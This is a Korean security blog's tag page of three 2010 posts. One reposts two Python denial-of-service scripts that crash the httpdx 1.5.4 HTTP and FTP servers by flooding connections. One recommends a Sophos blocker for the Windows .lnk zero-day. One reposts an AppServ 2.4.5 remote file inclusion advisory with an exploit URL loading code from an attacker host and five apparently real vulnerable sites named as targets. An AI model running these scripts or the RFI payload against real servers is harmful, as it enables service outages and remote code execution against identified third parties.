'exploit'에 해당되는 글 17건

  1. 2010.08.19 Multiple Denial of Service Vulnerabilities
  2. 2010.07.27 MS 취약점 Lnk 바로가기 파일 차단도구
  3. 2010.05.14 Remote file include in appserv 2.4.5
2010.08.19 10:53

Multiple Denial of Service Vulnerabilities

#!/usr/bin/env python
  
###########################################################################
#
# Title:    httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation. 
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################
  
import socket, sys
  
payload = ("GET / HTTP/1.1\r\n\r\n");
x=1;
  
try:
    while (x < 2048):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 80));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        x = x+1;
  
except:
    print ("[*] Success! We crashed the server in %d attempts." % x);
    print ("[i] [pocoftheday.blogspot.com]");
  
  
=====================================================================================
  
#!/usr/bin/env python
  
###########################################################################
#
# Title:    httpdx v1.5.4 Remote FTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation. 
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################
  
import socket, sys
  
payload = ("USER anonymous\r\n\r\n");
x=1;
  
try:
    while (x < 2048):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 21));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        x = x+1;
  
except:
    print ("[*] Success! We crashed the server in %d attempts." % x);
    print ("[i] [pocoftheday.blogspot.com]"); 


출처 : exploit-db.com

Trackback 0 Comment 0
2010.07.27 16:34

MS 취약점 Lnk 바로가기 파일 차단도구

마이크로소프트사의 Lnk(바로가기, Shortcut) Zero-Day 취약점(패치 미발표)을 이용한 악성코드 주의

지난 MS 윈도우 쉘 바로기가 .lnk 관련 취약점에 대해서 익스플로잇을 보호하기 위한 툴입니다.

패치가 나오기 전에 임시방편으로 사용하면 좋을듯 합니다.

# 익스폴로잇 보호 동영상
 

출처 : http://www.sophos.com/

Trackback 0 Comment 0
2010.05.14 14:28

Remote file include in appserv 2.4.5

======================================================================
Remote file include in appserv 2.4.5 (possible in previous versions)
======================================================================

[ What is Appserv ]

AppServ is the Apache/PHP/MySQL open source software installer packages.

Objective : - Easy to buid Webserver and Database Server

- For those who just beginning client/server programming.

- For web programmers/developers using PHP & MySQL.

- For programming techniques that is easily to be ported to other platforms such as WindowZ

- Single step installation , no need to perform multiple step, time consuming installation and configuration.

- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.

- If you hate and boring M$ IIS Webserver.

======================================================================

[ The bug ]

This in the directory appserv, file main.php:

======================================================================

include("$appserv_root/lang-english.php");

And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable

======================================================================

[ Exploit ]

http://[target]/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[ Real examples ]

http://www.jr.ac.th/appserv/main.php?appserv_root=http://[attacker]/
http://140.116.83.224/appserv/main.php?appserv_root=http://[attacker]/
http://mail2.ttes.tcc.edu.tw/www2/appserv/main.php?appserv_root=http://[attacker]/
http://163.21.245.171/appserv/main.php?appserv_root=http://[attacker]/
http://trainer.ma.cx/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[ Fix ]

Eliminate the directory appserv (it does not have any utility)

======================================================================
Author: Xez
Contact: Xez.1337@gmail.com
Appserv website: www.appservnetwork.com
======================================================================


출처 : http://securityvulns.com/

Trackback 0 Comment 0